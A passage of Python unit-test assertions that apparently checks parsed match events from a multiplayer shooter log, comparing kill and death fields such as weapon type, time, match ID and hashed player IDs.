assert e[42]['DATA']['VICTIM']['ARMOR'] is None # noqa
assert e[42]['DATA']['VICTIM']['BOT'] is None # noqa
assert e[42]['DATA']['VICTIM']['BOT_SKILL'] is None # noqa
assert e[42]['DATA']['VICTIM']['HEALTH'] is None # noqa
assert e[42]['DATA']['VICTIM']['HOLDABLE'] is None # noqa
assert e[42]['DATA']['VICTIM']['NAME'] is None # noqa
assert e[42]['DATA']['VICTIM']['POSITION']['X'] is None # noqa
assert e[42]['DATA']['VICTIM']['POSITION']['Y'] is None # noqa
assert e[42]['DATA']['VICTIM']['POSITION']['Z'] is None # noqa
assert e[42]['DATA']['VICTIM']['POWERUPS'] is None # noqa
assert e[42]['DATA']['VICTIM']['SPEED'] is None # noqa
assert e[42]['DATA']['VICTIM']['STEAM_ID'] == '254e24151c9e5466251073e6' # noqa
assert e[42]['DATA']['VICTIM']['SUBMERGED'] is None # noqa
assert e[42]['DATA']['VICTIM']['TEAM'] is None # noqa
assert e[42]['DATA']['VICTIM']['VIEW']['X'] is None # noqa
assert e[42]['DATA']['VICTIM']['VIEW']['Y'] is None # noqa
assert e[42]['DATA']['VICTIM']['VIEW']['Z'] is None # noqa
assert e[42]['DATA']['VICTIM']['WEAPON'] is None # noqa
assert e[42]['DATA']['WARMUP'] == False # noqa
assert e[42]['TYPE'] == 'PLAYER_KILL' # noqa
assert e[43]['DATA']['KILLER']['AIRBORNE'] is None # noqa
assert e[43]['DATA']['KILLER']['AMMO'] is None # noqa
assert e[43]['DATA']['KILLER']['ARMOR'] is None # noqa
assert e[43]['DATA']['KILLER']['BOT'] is None # noqa
assert e[43]['DATA']['KILLER']['BOT_SKILL'] is None # noqa
assert e[43]['DATA']['KILLER']['HEALTH'] is None # noqa
assert e[43]['DATA']['KILLER']['HOLDABLE'] is None # noqa
assert e[43]['DATA']['KILLER']['NAME'] is None # noqa
assert e[43]['DATA']['KILLER']['POSITION']['X'] is None # noqa
assert e[43]['DATA']['KILLER']['POSITION']['Y'] is None # noqa
assert e[43]['DATA']['KILLER']['POSITION']['Z'] is None # noqa
assert e[43]['DATA']['KILLER']['POWERUPS'] is None # noqa
assert e[43]['DATA']['KILLER']['SPEED'] is None # noqa
assert e[43]['DATA']['KILLER']['STEAM_ID'] == '6179638dba55b8f5d2da7838' # noqa
assert e[43]['DATA']['KILLER']['SUBMERGED'] is None # noqa
assert e[43]['DATA']['KILLER']['TEAM'] is None # noqa
assert e[43]['DATA']['KILLER']['VIEW']['X'] is None # noqa
assert e[43]['DATA']['KILLER']['VIEW']['Y'] is None # noqa
assert e[43]['DATA']['KILLER']['VIEW']['Z'] is None # noqa
assert e[43]['DATA']['KILLER']['WEAPON'] is None # noqa
assert e[43]['DATA']['MATCH_GUID'] == '19b5bc9bf2e789eab15613dd3ee3e97b' # noqa
assert e[43]['DATA']['MOD'] == 'ROCKET' # noqa
assert e[43]['DATA']['OTHER_TEAM_ALIVE'] is None # noqa
assert e[43]['DATA']['OTHER_TEAM_DEAD'] is None # noqa
assert e[43]['DATA']['ROUND'] is None # noqa
assert e[43]['DATA']['SUICIDE'] is None # noqa
assert e[43]['DATA']['TEAMKILL'] is None # noqa
assert e[43]['DATA']['TEAM_ALIVE'] is None # noqa
assert e[43]['DATA']['TEAM_DEAD'] is None # noqa
assert e[43]['DATA']['TIME'] == 138.4 # noqa
assert e[43]['DATA']['VICTIM']['AIRBORNE'] is None # noqa
assert e[43]['DATA']['VICTIM']['AMMO'] is None # noqa
assert e[43]['DATA']['VICTIM']['ARMOR'] is None # noqa
assert e[43]['DATA']['VICTIM']['BOT'] is None # noqa
assert e[43]['DATA']['VICTIM']['BOT_SKILL'] is None # noqa
assert e[43]['DATA']['VICTIM']['HEALTH'] is None # noqa
assert e[43]['DATA']['VICTIM']['HOLDABLE'] is None # noqa
assert e[43]['DATA']['VICTIM']['NAME'] is None # noqa
assert e[43]['DATA']['VICTIM']['POSITION']['X'] is None # noqa
assert e[43]['DATA']['VICTIM']['POSITION']['Y'] is None # noqa
assert e[43]['DATA']['VICTIM']['POSITION']['Z'] is None # noqa
assert e[43]['DATA']['VICTIM']['POWERUPS'] is None # noqa
assert e[43]['DATA']['VICTIM']['SPEED'] is None # noqa
assert e[43]['DATA']['VICTIM']['STEAM_ID'] == '254e24151c9e5466251073e6' # noqa
assert e[43]['DATA']['VICTIM']['SUBMERGED'] is None # noqa
assert e[43]['DATA']['VICTIM']['TEAM'] is None # noqa
assert e[43]['DATA']['VICTIM']['VIEW']['X'] is None # noqa
assert e[43]['DATA']['VICTIM']['VIEW']['Y'] is None # noqa
assert e[43]['DATA']['VICTIM']['VIEW']['Z'] is None # noqa
assert e[43]['DATA']['VICTIM']['WEAPON'] is None # noqa
assert e[43]['DATA']['WARMUP'] == False # noqa
assert e[43]['TYPE'] == 'PLAYER_DEATH' # noqa
assert e[44]['DATA']['KILLER']['AIRBORNE'] is None # noqa
assert e[44]['DATA']['KILLER']['AMMO'] is None # noqa
assert e[44]['DATA']['KILLER']['ARMOR'] is None # noqa
assert e[44]['DATA']['KILLER']['BOT'] is None # noqa
assert e[44]['DATA']['KILLER']['BOT_SKILL'] is None # noqa
assert e[44]['DATA']['KILLER']['HEALTH'] is None # noqa
assert e[44]['DATA']['KILLER']['HOLDABLE'] is None # noqa
assert e[44]['DATA']['KILLER']['NAME'] is None # noqa
assert e[44]['DATA']['KILLER']['POSITION']['X'] is None # noqa
assert e[44]['DATA']['KILLER']['POSITION']['Y'] is None # noqa
assert e[44]['DATA']['KILLER']['POSITION']['Z'] is None # noqa
assert e[44]['DATA']['KILLER']['POWERUPS'] is None # noqa
assert e[44]['DATA']['KILLER']['SPEED'] is None # noqa
assert e[44]['DATA']['KILLER']['STEAM_ID'] == '6179638dba55b8f5d2da7838' # noqa
assert e[44]['DATA']['KILLER']['SUBMERGED'] is None # noqa
assert e[44]['DATA']['KILLER']['TEAM'] is None # noqa
assert e[44]['DATA']['KILLER']['VIEW']['X'] is None # noqa
assert e[44]['DATA']['KILLER']['VIEW']['Y'] is None # noqa
assert e[44]['DATA']['KILLER']['VIEW']['Z'] is None # noqa
assert e[44]['DATA']['KILLER']['WEAPON'] is None # noqa
assert e[44]['DATA']['MATCH_GUID'] == '19b5bc9bf2e789eab15613dd3ee3e97b' # noqa
assert e[44]['DATA']['MOD'] == 'LIGHTNING' # noqa
assert e[44]['DATA']['OTHER_TEAM_ALIVE'] is None # noqa
assert e[44]['DATA']['OTHER_TEAM_DEAD'] is None # noqa
assert e[44]['DATA']['ROUND'] is None # noqa
assert e[44]['DATA']['SUICIDE'] is None # noqa
assert e[44]['DATA']['TEAMKILL'] is None # noqa
assert e[44]['DATA']['TEAM_ALIVE'] is None # noqa
assert e[44]['DATA']['TEAM_DEAD'] is None # noqa
assert e[44]['DATA']['TIME'] == 147.8 # noqa
assert e[44]['DATA']['VICTIM']['AIRBORNE'] is None # noqa
assert e[44]['DATA']['VICTIM']['AMMO'] is None # noqa
assert e[44]['DATA']['VICTIM']['ARMOR'] is None # noqa
assert e[44]['DATA']['VICTIM']['BOT'] is None # noqa
assert e[44]['DATA']['VICTIM']['BOT_SKILL'] is None # noqa
assert e[44]['DATA']['VICTIM']['HEALTH'] is None # noqa
assert e[44]['DATA']['VICTIM']['HOLDABLE'] is None # noqa
assert e[44]['DATA']['VICTIM']['NAME'] is None # noqa
assert e[44]['DATA']['VICTIM']['POSITION']['X'] is None # noqa
assert e[44]['DATA']['VICTIM']['POSITION']['Y'] is None # noqa
assert e[44]['DATA']['VICTIM']['POSITION']['Z'] is None # noqa
assert e[44]['DATA']['VICTIM']['POWERUPS'] is None # noqa
assert e[44]['DATA']['VICTIM']['SPEED'] is None # noqa
assert e[44]['DATA']['VICTIM']['STEAM_ID'] == '254e24151c9e5466251073e6' # noqa
assert e[44]['DATA']['VICTIM']['SUBMERGED'] is None # noqa
assert e[44]['DATA']['VICTIM']['TEAM'] is None # noqa
assert e[44]['DATA']['VICTIM']['VIEW']['X'] is None # noqa
assert e[44]['DATA']['VICTIM']['VIEW']['Y'] is None # noqa
assert e[44]['DATA']['VICTIM']['VIEW']['Z'] is None # noqa
assert e[44]['DATA']['VICTIM']['WEAPON'] is None # noqa
assert e[44]['DATA']['WARMUP'] == False # noqa
assert e[44]['TYPE'] == 'PLAYER_KILL' # noqa
assert e[45]['DATA']['KILLER']['AIRBORNE'] is None # noqa
assert e[45]['DATA']['KILLER']['AMMO'] is None # noqa
assert e[45]['DATA']['KILLER']['ARMOR'] is None # noqa
assert e[45]['DATA']['KILLER']['BOT'] is None # noqa
assert e[45]['DATA']['KILLER']['BOT_SKILL'] is None # noqa
assert e[45]['DATA']['KILLER']['HEALTH'] is None # noqa
assert e[45]['DATA']['KILLER']['HOLDABLE'] is None # noqa
assert e[45]['DATA']['KILLER']['NAME'] is None # noqa
assert e[45]['DATA']['KILLER']['POSITION']['X'] is None # noqa
assert e[45]['DATA']['KILLER']['POSITION']['Y'] is None # noqa
assert e[45]['DATA']['KILLER']['POSITION']['Z'] is None # noqa
assert e[45]['DATA']['KILLER']['POWERUPS'] is None # noqa
assert e[45]['DATA']['KILLER']['SPEED'] is None # noqa
assert e[45]['DATA']['KILLER']['STEAM_ID'] == '6179638dba55b8f5d2da7838' # noqa
assert e[45]['DATA']['KILLER']['SUBMERGED'] is None # noqa
assert e[45]['DATA']['KILLER']['TEAM'] is None # noqa
assert e[45]['DATA']['KILLER']['VIEW']['X'] is None # noqa
assert e[45]['DATA']['KILLER']['VIEW']['Y'] is None # noqa
assert e[45]['DATA']['KILLER']['VIEW']['Z'] is None # noqa
assert e[45]['DATA']['KILLER']['WEAPON'] is None # noqa
assert e[45]['DATA']['MATCH_GUID'] == '19b5bc9bf2e789eab15613dd3ee3e97b' # noqa
assert e[45]['DATA']['MOD'] == 'LIGHTNING' # noqa
assert e[45]['DATA']['OTHER_TEAM_ALIVE'] is None # noqa
assert e[45]['DATA']['OTHER_TEAM_DEAD'] is None # noqa
assert e[45]['DATA']['ROUND'] is None # noqa
assert e[45]['DATA']['SUICIDE'] is None # noqa
assert e[45]['DATA']['TEAMKILL'] is None # noqa
assert e[45]['DATA']['TEAM_ALIVE'] is None # noqa
assert e[45]['DATA']['TEAM_DEAD'] is None # noqa
assert e[45]['DATA']['TIME'] == 147.8 # noqa
assert e[45]['DATA']['VICTIM']['AIRBORNE'] is None # noqa
assert e[45]['DATA']['VICTIM']['AMMO'] is None # noqa
assert e[45]['DATA']['VICTIM']['ARMOR'] is None # noqa
assert e[45]['DATA']['VICTIM']['BOT'] is None # noqa
assert e[45]['DATA']['VICTIM']['BOT_SKILL'] is None # noqa
assert e[45]['DATA']['VICTIM']['HEALTH'] is None # noqa
assert e[45]['DATA']['VICTIM']['HOLDABLE'] is None # noqa
assert e[45]['DATA']['VICTIM']['NAME'] is None # noqa
assert e[45]['DATA']['VICTIM']['POSITION']['X'] is None # noqa
assert e[45]['DATA']['VICTIM']['POSITION']['Y'] is None # noqa
assert e[45]['DATA']['VICTIM']['POSITION']['Z'] is None # noqa
assert e[45]['DATA']['VICTIM']['POWERUPS'] is None # noqa
assert e[45]['DATA']['VICTIM']['SPEED'] is None # noqa
assert e[45]['DATA']['VICTIM']['STEAM_ID'] == '254e24151c9e5466251073e6' # noqa
assert e[45]['DATA']['VICTIM']['SUBMERGED'] is None # noqa
assert e[45]['DATA']['VICTIM']['TEAM'] is None # noqa
assert e[45]['DATA']['VICTIM']['VIEW']['X'] is None # noqa
assert e[45]['DATA']['VICTIM']['VIEW']['Y'] is None # noqa
assert e[45]['DATA']['VICTIM']['VIEW']['Z'] is None # noqa
assert e[45]['DATA']['VICTIM']['WEAPON'] is None # noqa
assert e[45]['DATA']['WARMUP'] == False # noqa
assert e[45]['TYPE'] == 'PLAYER_DEATH' # noqa
assert e[46]['DATA']['KILLER']['AIRBORNE'] is None # noqa
assert e[46]['DATA']['KILLER']['AMMO'] is None # noqa
assert e[46]['DATA']['KILLER']['ARMOR'] is None # noqa
assert e[46]['DATA']['KILLER']['BOT'] is None # noqa
assert e[46]['DATA']['KILLER']['BOT_SKILL'] is None # noqa
assert e[46]['DATA']['KILLER']['HEALTH'] is None # noqa
assert e[46]['DATA']['KILLER']['HOLDABLE'] is None # noqa
assert e[46]['DATA']['KILLER']['NAME'] is None # noqa
assert e[46]['DATA']['KILLER']['POSITION']['X'] is None # noqa
assert e[46]['DATA']['KILLER']['POSITION']['Y'] is None # noqa
assert e[46]['DATA']['KILLER']['POSITION']['Z'] is None # noqa
assert e[46]['DATA']['KILLER']['POWERUPS'] is None # noqa
assert e[46]['DATA']['KILLER']['SPEED'] is None # noqa
assert e[46]['DATA']['KILLER']['STEAM_ID'] == '7727c59e2bf61c4a67428d15' # noqa
assert e[46]['DATA']['KILLER']['SUBMERGED'] is None # noqa
assert e[46]['DATA']['KILLER']['TEAM'] is None # noqa
assert e[46]['DATA']['KILLER']['VIEW']['X'] is None # noqa
assert e[46]['DATA']['KILLER']['VIEW']['Y'] is None # noqa
assert e[46]['DATA']['KILLER']['VIEW']['Z'] is None # noqa
assert e[46]['DATA']['KILLER']['WEAPON'] is None # noqa
assert e[46]['DATA']['MATCH_GUID'] == '19b5bc9bf2e789eab15613dd3ee3e97b' # noqa
assert e[46]['DATA']['MOD'] == 'SHOTGUN' # noqa
assert e[46]['DATA']['OTHER_TEAM_ALIVE'] is None # noqa
assert e[46]['DATA']['OTHER_TEAM_DEAD'] is None # noqa
assert e[46]['DATA']['ROUND'] is None # noqa
assert e[46]['DATA']['SUICIDE'] is None # noqa
assert e[46]['DATA']['TEAMKILL'] is None # noqa
assert e[46]['DATA']['TEAM_ALIVE'] is None # noqa
assert e[46]['DATA']['TEAM_DEAD'] is None # noqa
assert e[46]['DATA']['TIME'] == 151.4 # noqa
assert e[46]['DATA']['VICTIM']['AIRBORNE'] is None # noqa
assert e[46]['DATA']['VICTIM']['AMMO'] is None # noqa
assert e[46]['DATA']['VICTIM']['ARMOR'] is None # noqa
assert e[46]['DATA']['VICTIM']['BOT'] is None # noqa
assert e[46]['DATA']['VICTIM']['BOT_SKILL'] is None # noqa
assert e[46]['DATA']['VICTIM']['HEALTH'] is None # noqa
assert e[46]['DATA']['VICTIM']['HOLDABLE'] is None # noqa
assert e[46]['DATA']['VICTIM']['NAME'] is None # noqa
assert e[46]['DATA']['VICTIM']['POSITION']['X'] is None # noqa
assert e[46]['DATA']['VICTIM']['POSITION']['Y'] is None # noqa
assert e[46]['DATA']['VICTIM']['POSITION']['Z'] is None # noqa
assert e[46]['DATA']['VICTIM']['POWERUPS'] is None # noqa
assert e[46]['DATA']['VICTIM']['SPEED'] is None # noqa
assert e[46]['DATA']['VICTIM']['STEAM_ID'] == '6179638dba55b8f5d2da7838' # noqa
assert e[46]['DATA']['VICTIM']['SUBMERGED'] is None # noqa
assert e[46]['DATA']['VICTIM']['TEAM'] is None # noqa
assert e[46]['DATA']['VICTIM']['VIEW']['X'] is None # noqa
assert e[46]['DATA']['VICTIM']['VIEW']['Y'] is None # noqa
assert e[46]['DATA']['VICTIM']['VIEW']['Z'] is None # noqa
assert e[46]['DATA']['VICTIM']['WEAPON'] is None # noqa
assert e[46]['DATA']['WARMUP'] == False # noqa
assert e[46]['TYPE'] == 'PLAYER_KILL' # noqa
assert e[47]['DATA']['KILLER']['AIRBORNE'] is None # noqa
assert e[47]['DATA']['KILLER']['AMMO'] is None # noqa
assert e[47]['DATA']['KILLER']['ARMOR'] is None # noqa
assert e[47]['DATA']['KILLER']['BOT'] is None # noqa
assert e[47]['DATA']['KILLER']['BOT_SKILL'] is None # noqa
assert e[47]['DATA']['KILLER']['HEALTH'] is None # noqa
assert e[47]['DATA']['KILLER']['HOLDABLE'] is None # noqa
assert e[47]['DATA']['KILLER']['NAME'] is None # noqa
assert e[47]['DATA']['KILLER']['POSITION']['X'] is None # noqa
assert e[47]['DATA']['KILLER']['POSITION']['Y'] is None # noqa
assert e[47]['DATA']['KILLER']['POSITION']['Z'] is None # noqa
assert e[47]['DATA']['KILLER']['POWERUPS'] is None # noqa
assert e[47]['DATA']['KILLER']['SPEED'] is None # noqa
assert e[47]['DATA']['KILLER']['STEAM_ID'] == '7727c59e2bf61c4a67428d15' # noqa
assert e[47]['DATA']['KILLER']['SUBMERGED'] is None # noqa
assert e[47]['DATA']['KILLER']['TEAM'] is None # noqa
assert e[47]['DATA']['KILLER']['VIEW']['X'] is None # noqa
assert e[47]['DATA']['KILLER']['VIEW']['Y'] is None # noqa
assert e[47]['DATA']['KILLER']['VIEW']['Z'] is None # noqa
assert e[47]['DATA']['KILLER']['WEAPON'] is None # noqa
assert e[47]['DATA']['MATCH_GUID'] == '19b5bc9bf2e789eab15613dd3ee3e97b' # noqa
assert e[47]['DATA']['MOD'] == 'SHOTGUN' # noqa
assert e[47]['DATA']['OTHER_TEAM_ALIVE'] is None # noqa
assert e[47]['DATA']['OTHER_TEAM_DEAD'] is None # noqa
assert e[47]['DATA']['ROUND'] is None # noqa
assert e[47]['DATA']['SUICIDE'] is None # noqa
assert e[47]['DATA']['TEAMKILL'] is None # noqa
assert e[47]['DATA']['TEAM_ALIVE'] is None # noqa
assert e[47]['DATA']['TEAM_DEAD'] is None # noqa
assert e[47]['DATA']['TIME'] == 151.4 # noqa
assert e[47]['DATA']['VICTIM']['AIRBORNE'] is None # noqa
assert e[47]['DATA']['VICTIM']['AMMO'] is None # noqa
assert e[47]['DATA']['VICTIM']['ARMOR'] is None # noqa
assert e[47]['DATA']['VICTIM']['BOT'] is None # noqa
assert e[47]['DATA']['VICTIM']['BOT_SKILL'] is None # noqa
assert e[47]['DATA']['VICTIM']['HEALTH'] is None # noqa
assert e[47]['DATA']['VICTIM']['HOLDABLE'] is None # noqa
assert e[47]['DATA']['VICTIM']['NAME'] is None # noqa
assert e[47]['DATA']['VICTIM']['POSITION']['X'] is None # noqa
assert e[47]['DATA']['VICTIM']['POSITION']['Y'] is None # noqa
assert e[47]['DATA']['VICTIM']['POSITION']['Z'] is None # noqa
assert e[47]['DATA']['VICTIM']['POWERUPS'] is None # noqa
assert e[47]['DATA']['VICTIM']['SPEED'] is None # noqa
assert e[47]['DATA']['VICTIM']['STEAM_ID'] == '6179638dba55b8f5d2da7838' # noqa
assert e[47]['DATA']['VICTIM']['SUBMERGED'] is None # noqa
assert e[47]['DATA']['VICTIM']['TEAM'] is None # noqa
assert e[47]['DATA']['VICTIM']['VIEW']['X'] is None # noqa
assert e[47]['DATA']['VICTIM']['VIEW']['Y'] is None # noqa
assert e[47]['DATA']['VICTIM']['VIEW']['Z'] is None # noqa
assert e[47]['DATA']['VICTIM']['WEAPON'] is None # noqa
assert e[47]['DATA']['WARMUP'] == False # noqa
assert e[47]['TYPE'] == 'PLAYER_DEATH' # noqa
assert e[48]['DATA']['KILLER']['AIRBORNE'] is None # noqa
assert e[48]['DATA']['KILLER']['AMMO'] is None # noqa
assert e[48]['DATA']['KILLER']['ARMOR'] is None # noqa
assert e[48]['DATA']['KILLER']['BOT'] is None # noqa
assert e[48]['DATA']['KILLER']['BOT_SKILL'] is None # noqa
assert e[48]['DATA']['KILLER']['HEALTH'] is None # noqa
assert e[48]['DATA']['KILLER']['HOLDABLE'] is None # noqa
assert e[48]['DATA']['KILLER']['NAME'] is None # noqa
assert e[48]['DATA']['KILLER']['POSITION']['X'] is None # noqa
assert e[48]['DATA']['KILLER']['POSITION']['Y'] is None # noqa
assert e[48]['DATA']['KILLER']['POSITION']['Z'] is None # noqa
assert e[48]['DATA']['KILLER']['POWERUPS'] is None # noqa
assert e[48]['DATA']['KILLER']['SPEED'] is None # noqa
assert e[48]['DATA']['KILLER']['STEAM_ID'] == '6179638dba55b8f5d2da7838' # noqa
assert e[48]['DATA']['KILLER']['SUBMERGED'] is None # noqa
assert e[48]['DATA']['KILLER']['TEAM'] is None # noqa
assert e[48]['DATA']['KILLER']['VIEW']['X'] is None # noqa
assert e[48]['DATA']['KILLER']['VIEW']['Y'] is None # noqa
assert e[48]['DATA']['KILLER']['VIEW']['Z'] is None # noqa
assert e[48]['DATA']['KILLER']['WEAPON'] is None # noqa
assert e[48]['DATA']['MATCH_GUID'] == '19b5bc9bf2e789eab15613dd3ee3e97b' # noqa
assert e[48]['DATA']['MOD'] == 'GAUNTLET' # noqa
assert e[48]['DATA']['OTHER_TEAM_ALIVE'] is None # noqa
assert e[48]['DATA']['OTHER_TEAM_DEAD'] is None # noqa
assert e[48]['DATA']['ROUND'] is None # noqa
assert e[48]['DATA']['SUICIDE'] is None # noqa
assert e[48]['DATA']['TEAMKILL'] is None # noqa
assert e[48]['DATA']['TEAM_ALIVE'] is None # noqa
assert e[48]['DATA']['TEAM_DEAD'] is None # noqa
assert e[48]['DATA']['TIME'] == 169.9 # noqa
assert e[48]['DATA']['VICTIM']['AIRBORNE'] is None # noqa
assert e[48]['DATA']['VICTIM']['AMMO'] is None # noqa
assert e[48]['DATA']['VICTIM']['ARMOR'] is None # noqa
assert e[48]['DATA']['VICTIM']['BOT'] is None # noqa
assert e[48]['DATA']['VICTIM']['BOT_SKILL'] is None # noqa
assert e[48]['DATA']['VICTIM']['HEALTH'] is None # noqa
assert e[48]['DATA']['VICTIM']['HOLDABLE'] is None # noqa
assert e[48]['DATA']['VICTIM']['NAME'] is None # noqa
assert e[48]['DATA']['VICTIM']['POSITION']['X'] is None # noqa
assert e[48]['DATA']['VICTIM']['POSITION']['Y'] is None # noqa
assert e[48]['DATA']['VICTIM']['POSITION']['Z'] is None # noqa
assert e[48]['DATA']['VICTIM']['POWERUPS'] is None # noqa
assert e[48]['DATA']['VICTIM']['SPEED'] is None # noqa
assert e[48]['DATA']['VICTIM']['STEAM_ID'] == '7727c59e2bf61c4a67428d15' # noqa
assert e[48]['DATA']['VICTIM']['SUBMERGED'] is None # noqa
assert e[48]['DATA']['VICTIM']['TEAM'] is None # noqa
assert e[48]['DATA']['VICTIM']['VIEW']['X'] is None # noqa
assert e[48]['DATA']['VICTIM']['VIEW']['Y'] is None # noqa
assert e[48]['DATA']['VICTIM']['VIEW']['Z'] is None # noqa
assert e[48]['DATA']['VICTIM']['WEAPON'] is None # noqa
assert e[48]['DATA']['WARMUP'] == False # noqa
assert e[48]['TYPE'] == 'PLAYER_KILL' # noqa
assert e[49]['DATA']['KILLER']['AIRBORNE'] is None # noqa
assert e[49]['DATA']['KILLER']['AMMO'] is None # noqa
assert e[49]['DATA']['KILLER']['ARMOR'] is None # noqa
assert e[49]['DATA']['KILLER']['BOT'] is None # noqa
assert e[49]['DATA']['KILLER']['BOT_SKILL'] is None # noqa
assert e[49]['DATA']['KILLER']['HEALTH'] is None # noqa
assert e[49]['DATA']['KILLER']['HOLDABLE'] is None # noqa
assert e[49]['DATA']['KILLER']['NAME'] is None # noqa
assert e[49]['DATA']['KILLER']['POSITION']['X'] is None # noqa
assert e[49]['DATA']['KILLER']['POSITION']['Y'] is None # noqa
assert e[49]['DATA']['KILLER']['POSITION']['Z'] is None # noqa
assert e[49]['DATA']['KILLER']['POWERUPS'] is None # noqa
assert e[49]['DATA']['KILLER']['SPEED'] is None # noqa
assert e[49]['DATA']['KILLER']['STEAM_ID'] == '6179638dba55b8f5d2da7838' # noqa
assert e[49]['DATA']['KILLER']['SUBMERGED'] is None # noqa
assert e[49]['DATA']['KILLER']['TEAM'] is None # noqa
assert e[49]['DATA']['KILLER']['VIEW']['X'] is None # noqa
assert e[49]['DATA']['KILLER']['VIEW']['Y'] is None # noqa
assert e[49]['DATA']['KILLER']['VIEW']['Z'] is None # noqa
assert e[49]['DATA']['KILLER']['WEAPON'] is None # noqa
assert e[49]['DATA']['MATCH_GUID'] == '19b5bc9bf2e789eab15613dd3ee3e97b' # noqa
assert e[49]['DATA']['MOD'] == 'GAUNTLET' # noqa
assert e[49]['DATA']['OTHER_TEAM_ALIVE'] is None # noqa
assert e[49]['DATA']['OTHER_TEAM_DEAD'] is None # noqa
assert e[49]['DATA']['ROUND'] is None # noqa
assert e[49]['DATA']['SUICIDE'] is None # noqa
assert e[49]['DATA']['TEAMKILL'] is None # noqa
assert e[49]['DATA']['TEAM_ALIVE'] is None # noqa
assert e[49]['DATA']['TEAM_DEAD'] is None # noqa
assert e[49]['DATA']['TIME'] == 169.9 # noqa
assert e[49]['DATA']['VICTIM']['AIRBORNE'] is None # noqa
assert e[49]['DATA']['VICTIM']['AMMO'] is None # noqa
assert e[49]['DATA']['VICTIM']['ARMOR'] is None # noqa
assert e[49]['DATA']['VICTIM']['BOT'] is None # noqa
assert e[49]['DATA']['VICTIM']['BOT_SKILL'] is None # noqa
assert e[49]['DATA']['VICTIM']['HEALTH'] is None # noqa
assert e[49]['DATA']['VICTIM']['HOLDABLE'] is None # noqa
assert e[49]['DATA']['VICTIM']['NAME'] is None # noqa
assert e[49]['DATA']['VICTIM']['POSITION']['X'] is None # noqa
assert e[49]['DATA']['VICTIM']['POSITION']['Y'] is None # noqa
assert e[49]['DATA']['VICTIM']['POSITION']['Z'] is None # noqa
assert e[49]['DATA']['VICTIM']['POWERUPS'] is None # noqa
assert e[49]['DATA']['VICTIM']['SPEED'] is None # noqa
assert e[49]['DATA']['VICTIM']['STEAM_ID'] == '7727c59e2bf61c4a67428d15' # noqa
assert e[49]['DATA']['VICTIM']['SUBMERGED'] is None # noqa
assert e[49]['DATA']['VICTIM']['TEAM'] is None # noqa
assert e[49]['DATA']['VICTIM']['VIEW']['X'] is None # noqa
assert e[49]['DATA']['VICTIM']['VIEW']['Y'] is None # noqa
assert e[49]['DATA']['VICTIM']['VIEW']['Z'] is None # noqa
assert e[49]['DATA']['VICTIM']['WEAPON'] is None # noqa
assert e[49]['DATA']['WARMUP'] == False # noqa
assert e[49]['TYPE'] == 'PLAYER_DEATH' # noqa
assert e[50]['DATA']['KILLER']['AIRBORNE'] is None # noqa
assert e[50]['DATA']['KILLER']['AMMO'] is None # noqa
assert e[50]['DATA']['KILLER']['ARMOR'] is None # noqa
assert e[50]['DATA']['KILLER']['BOT'] is None # noqa
assert e[50]['DATA']['KILLER']['BOT_SKILL'] is None # noqa
assert e[50]['DATA']['KILLER']['HEALTH'] is None # noqa
assert e[50]['DATA']['KILLER']['HOLDABLE'] is None # noqa
assert e[50]['DATA']['KILLER']['NAME'] is None # noqa
assert e[50]['DATA']['KILLER']['POSITION']['X'] is None # noqa
assert e[50]['DATA']['KILLER']['POSITION']['Y'] is None # noqa
assert e[50]['DATA']['KILLER']['POSITION']['Z'] is None # noqa
assert e[50]['DATA']['KILLER']['POWERUPS'] is None # noqa
assert e[50]['DATA']['KILLER']['SPEED'] is None # noqa
assert e[50]['DATA']['KILLER']['STEAM_ID'] == '254e24151c9e5466251073e6' # noqa
assert e[50]['DATA']['KILLER']['SUBMERGED'] is None # noqa
assert e[50]['DATA']['KILLER']['TEAM'] is None # noqa
assert e[50]['DATA']['KILLER']['VIEW']['X'] is None # noqa
assert e[50]['DATA']['KILLER']['VIEW']['Y'] is None # noqa
assert e[50]['DATA']['KILLER']['VIEW']['Z'] is None # noqa
assert e[50]['DATA']['KILLER']['WEAPON'] is None # noqa
assert e[50]['DATA']['MATCH_GUID'] == '19b5bc9bf2e789eab15613dd3ee3e97b' # noqa
assert e[50]['DATA']['MOD'] == 'SHOTGUN' # noqa
assert e[50]['DATA']['OTHER_TEAM_ALIVE'] is None # noqa
assert e[50]['DATA']['OTHER_TEAM_DEAD'] is None # noqa
assert e[50]['DATA']['ROUND'] is None # noqa
assert e[50]['DATA']['SUICIDE'] is None # noqa
assert e[50]['DATA']['TEAMKILL'] is None # noqa
assert e[50]['DATA']['TEAM_ALIVE'] is None # noqa
assert e[50]['DATA']['TEAM_DEAD'] is None # noqa
assert e[50]['DATA']['TIME'] == 180.1 # noqa
assert e[50]['DATA']['VICTIM']['AIRBORNE'] is None # noqa
assert e[50]['DATA']['VICTIM']['AMMO'] is None # noqa
assert e[50]['DATA']['VICTIM']['ARMOR'] is None # noqa
assert e[50]['DATA']['VICTIM']['BOT'] is None # noqa
assert e[50]['DATA']['VICTIM']['BOT_SKILL'] is None # noqa
assert e[50]['DATA']['VICTIM']['HEALTH'] is None # noqa
assert e[50]['DATA']['VICTIM']['HOLDABLE'] is None # noqa
assert e[50]['DATA']['VICTIM']['NAME'] is None # noqa
assert e[50]['DATA']['VICTIM']['POSITION']['X'] is None # noqa
assert e[50]['DATA']['VICTIM']['POSITION']['Y'] is None # noqa
assert e[50]['DATA']['VICTIM']['POSITION']['Z'] is None # noqa
assert e[50]['DATA']['VICTIM']['POWERUPS'] is None # noqa
assert e[50]['DATA']['VICTIM']['SPEED'] is None # noqa
assert e[50]['DATA']['VICTIM']['STEAM_ID'] == '6179638dba55b8f5d2da7838' # noqa
assert e[50]['DATA']['VICTIM']['SUBMERGED'] is None # noqa
assert e[50]['DATA']['VICTIM']['TEAM'] is None # noqa
assert e[50]['DATA']['VICTIM']['VIEW']['X'] is None # noqa
assert e[50]['DATA']['VICTIM']['VIEW']['Y'] is None # noqa
assert e[50]['DATA']['VICTIM']['VIEW']['Z'] is None # noqa
assert e[50]['DATA']['VICTIM']['WEAPON'] is None # noqa
assert e[50]['DATA']['WARMUP'] == False # noqa
assert e[50]['TYPE'] == 'PLAYER_KILL' # noqa
assert e[51]['DATA']['KILLER']['AIRBORNE'] is None # noqa
assert e[51]['DATA']['KILLER']['AMMO'] is None # noqa
assert e[51]['DATA']['KILLER']['ARMOR'] is None # noqa
assert e[51]['DATA']['KILLER']['BOT'] is None # noqa
assert e[51]['DATA']['KILLER']['BOT_SKILL'] is None # noqa
assert e[51]['DATA']['KILLER']['HEALTH'] is None # noqa
assert e[51]['DATA']['KILLER']['HOLDABLE'] is None # noqa
